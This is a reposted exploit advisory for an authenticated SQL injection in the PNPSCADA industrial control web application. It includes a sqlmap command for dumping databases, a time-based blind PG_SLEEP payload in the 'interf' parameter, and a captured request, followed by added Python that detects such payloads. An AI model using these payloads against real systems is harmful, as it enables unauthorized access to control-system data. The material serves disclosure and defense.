PNPSCADA 2.200816204020 SQL Injection ≈ Packet Storm – Digitalmunition


Published on August 22nd, 2020



# Exploit Title: PNPSCADA 2.200816204020 – ‘interf’ SQL Injection (Authenticated)
# Google Dork: –
# Date: 2020-08-17
# Exploit Author: İsmail ERKEK
# Vendor Homepage:
# Version: 2.200816204020
# Tested on: –

1. Description:

PNPSCADA 2.200816204020 allows SQL Injection via parameter ‘interf’ in
/browse.jsp. Exploiting this issue could allow an attacker to compromise
the application, access or modify data, or exploit latent vulnerabilities
in the underlying database.

2. Proof of Concept:

In Burpsuite, intercept a request from one of the affected pages that carries
the ‘interf’ parameter and save it to a file such as fuel.req. Then run sqlmap
on the saved request to extract the data from the database:

sqlmap -r req-pnp-browse.txt --risk=3 --level=5 --dbs --random-agent

3. Example payload:

(time-based blind)

memh=803509994960085058&searchStr=&replaceId=k1&multiple=yes&interf=115 AND
6380=(SELECT 6380 FROM PG_SLEEP(5))&page=1&mselect=98831
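
For defenders reviewing proxy or WAF captures of /browse.jsp traffic, the following added example (not part of the original advisory or the vendor's code) flags form bodies whose ‘interf’ value is not a plain integer. That ‘interf’ is an integer id is an assumption drawn from the "115" prefix in the payload above; the function name and the benign and encoded sample bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

PARAM = "interf"                      # parameter named in the advisory
INT_RE = re.compile(r"[0-9]{1,18}")   # assumption: the value is a plain integer id
# Tokens only enrich the alert text; any non-integer value is reported regardless.
SQL_HINTS = re.compile(r"\b(pg_sleep|select|union|and|or)\b|--|;|'", re.I)

# Body from the advisory's "Example payload" section (wrapped line rejoined).
ADVISORY_BODY = ("memh=803509994960085058&searchStr=&replaceId=k1&multiple=yes"
                 "&interf=115 AND 6380=(SELECT 6380 FROM PG_SLEEP(5))"
                 "&page=1&mselect=98831")
# Constructed samples: a benign request and a URL-encoded variant.
BENIGN_BODY = "memh=803509994960085058&searchStr=&interf=115&page=1"
ENCODED_BODY = "interf=115%20AND%201%3D1&page=1"


def check_body(body: str) -> list:
    """Return findings for one application/x-www-form-urlencoded body."""
    findings = []
    # parse_qs percent-decodes values, so encoded payloads are compared decoded.
    values = parse_qs(body, keep_blank_values=True).get(PARAM, [])
    if len(values) > 1:
        findings.append(f"{PARAM}: sent {len(values)} times")
    for value in values:
        if INT_RE.fullmatch(value):
            continue
        hints = sorted({m.group(0).lower() for m in SQL_HINTS.finditer(value)})
        detail = f" (SQL tokens: {', '.join(hints)})" if hints else ""
        findings.append(f"{PARAM}: non-integer value {value!r}{detail}")
    return findings


if __name__ == "__main__":
    for name, body in [("advisory", ADVISORY_BODY), ("benign", BENIGN_BODY),
                       ("encoded", ENCODED_BODY)]:
        print(name, check_body(body) or "ok")
```

The same integer-only rule, enforced server-side before the value reaches a parameterized query, is the corresponding fix for this class of bug.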

4. Burpsuite request:

POST /browse.jsp HTTP/1.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Cookie: wiki=; psl=7465737433; JSESSIONID=1ojrclvd94cpfebapnqebli37


Best Regards.